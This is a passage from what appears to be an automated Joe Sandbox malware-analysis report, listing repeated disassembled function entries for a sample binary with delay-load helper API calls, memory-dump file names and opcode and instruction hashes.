                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: ff19af8448a2aa4b554bde0c8daaa365bd76b7debd57ed69c7759377d0c56c14
                                                                                                                                                                                                    • Instruction ID: c97d1d40fb6918d8f3dac6a7f23423d53d48529660d5b19aa54f638f7ae5be52
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff19af8448a2aa4b554bde0c8daaa365bd76b7debd57ed69c7759377d0c56c14
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFB012D935C10AAC3104738D1C07C3B120CF0C3B11330413FF815C0681E8406D040B33
                                                                                                                                                                                                    Function 0088E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 120de78615a76024f880037dab2a637cdd631edc253d78828ed2245b565ebd99
                                                                                                                                                                                                    • Instruction ID: 3e437f564dd867cfa271075057aba9ff0bbd5c6b79f15a9b5e3fcaa828981b84
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 120de78615a76024f880037dab2a637cdd631edc253d78828ed2245b565ebd99
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEB012D5358005AD310477491C07C3B121CF0C3B11330C13FFC15C0781E840AC080A33
                                                                                                                                                                                                    Function 0088E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 9f51d41c7ad79a9f71b5e5984c5f118ca21085bd864208db1a0e435d12288b14
                                                                                                                                                                                                    • Instruction ID: 7fc6dc1378f53c0bfda2f3c9458fd3a1d257dce9530b551935952728f3aa916b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f51d41c7ad79a9f71b5e5984c5f118ca21085bd864208db1a0e435d12288b14
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B012E9398005AC310472491D07C3B128CF0C3B11330413FF815C0681FC406D050A33
                                                                                                                                                                                                    Function 0088E2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 3f9bd84e1358d9139a8e7f2646df311d1eb6e48a15aaeefe0856fae60f86d805
                                                                                                                                                                                                    • Instruction ID: 572b4757a78d0dbcf89d3dc4c849e46440349291386f573164a06874600a8b13
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f9bd84e1358d9139a8e7f2646df311d1eb6e48a15aaeefe0856fae60f86d805
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3B012D5758006AC310473491C07C3B120CF0C2B11330453FF815C06C1E8406C040A33
                                                                                                                                                                                                    Function 0088E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: fcceaa17cfbe3eb1141ec854e3e20fe165dc4409a9aebf159736ced3aa546796
                                                                                                                                                                                                    • Instruction ID: d968a5f3087013c2b9660c1ce9a00cafea778c642e7813b1951f9b8c4fa9dce4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcceaa17cfbe3eb1141ec854e3e20fe165dc4409a9aebf159736ced3aa546796
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9B012D5358005AD310473491D07C3B121CF0C2B11330813FF815C0781EC506D0D0A33
                                                                                                                                                                                                    Function 0088E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 267e25f75cf0580a73f5aa4d1570fe7311769ef49d8e2208f96cbd2336ac588a
                                                                                                                                                                                                    • Instruction ID: 13d3df87b07d12fef6540e86f9c9718bb86067bd7fb52a65d6471e535a5c620c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 267e25f75cf0580a73f5aa4d1570fe7311769ef49d8e2208f96cbd2336ac588a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6B012D5358145BD314473491C07C3B121CF0C2B11330823FF815C0781E8406C480A33
                                                                                                                                                                                                    Function 0088E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 291cfd3736edcde4baa07b46180b11ee3386c93b626fb5d0cd56851d9c3e00d1
                                                                                                                                                                                                    • Instruction ID: 76ee370770adffbb83d714a1eb55e4e98f6f5d80f97a93efb20f0a9f6058ce7c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 291cfd3736edcde4baa07b46180b11ee3386c93b626fb5d0cd56851d9c3e00d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDB012E5358005FC310472491C07C3B120CF0C3F11330813FFC15C0681E840AD040A33
                                                                                                                                                                                                    Function 0088E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 7894c99884204963ab68db1d48c29ea560cf6d1e896344184ea16f05a6c5f49c
                                                                                                                                                                                                    • Instruction ID: 800b9bdc84b22921b28ee2a8f18c34f38725454ed5ec6f6dea626d54c3a95ac7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7894c99884204963ab68db1d48c29ea560cf6d1e896344184ea16f05a6c5f49c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0B012E5358105FC314472491C07C3B120CF0C2F11330423FF815C0681E8406D440A33
                                                                                                                                                                                                    Function 0088E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 7eb150b104dcec5129fdabcfddca92b79dd2013eefd2bc9cf0206fd293c44ff5
                                                                                                                                                                                                    • Instruction ID: 7328260d80e043d0b6d6d25ce1a59679ffbf96f178ac5e6fda994772b86f60cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eb150b104dcec5129fdabcfddca92b79dd2013eefd2bc9cf0206fd293c44ff5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FB012E5358006EC3104734A5C07C3B120CF0C2F11330413FF815C0681E8406D040A33
                                                                                                                                                                                                    Function 0088E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 865a59fd7cfabea985741e1fddb756b4612a8381012951f99dc9b850f9d08039
                                                                                                                                                                                                    • Instruction ID: 267342169c55d9fa134b4ff915731aeb9dce9f5132469f4b8ec2c8b6026248d7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 865a59fd7cfabea985741e1fddb756b4612a8381012951f99dc9b850f9d08039
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52B012E5358005EC310472491D07C3B120CF0C2F11330413FF815C0681EC406E050A33
                                                                                                                                                                                                    Function 0088E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: ad2a7e95e5192c8e286d6449a0aa9a2dd8770eedd298f01d2df455ae20460788
                                                                                                                                                                                                    • Instruction ID: 7d194658517c01ed7fdd31bbd3212f69d34ffd1a7213e65f9434d49fe3d433af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad2a7e95e5192c8e286d6449a0aa9a2dd8770eedd298f01d2df455ae20460788
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBB012D5359045AC310472491C07C3F120DF0C3B11330813FFC15C0681E840EC040A33
                                                                                                                                                                                                    Function 0088E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: d57739f90f66517873d0c405fdc77db1874ee5d0ad8879a5aba58fc37f56dfcf
                                                                                                                                                                                                    • Instruction ID: eec60d3dc24dca3126aa551b11386a332a5ec05dcbb4394fdb607be3d2464854
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d57739f90f66517873d0c405fdc77db1874ee5d0ad8879a5aba58fc37f56dfcf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47B012E5359145BC314473891C07C3F120DF0C2B11330423FF815C0681E840AC480A33
                                                                                                                                                                                                    Function 0088E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
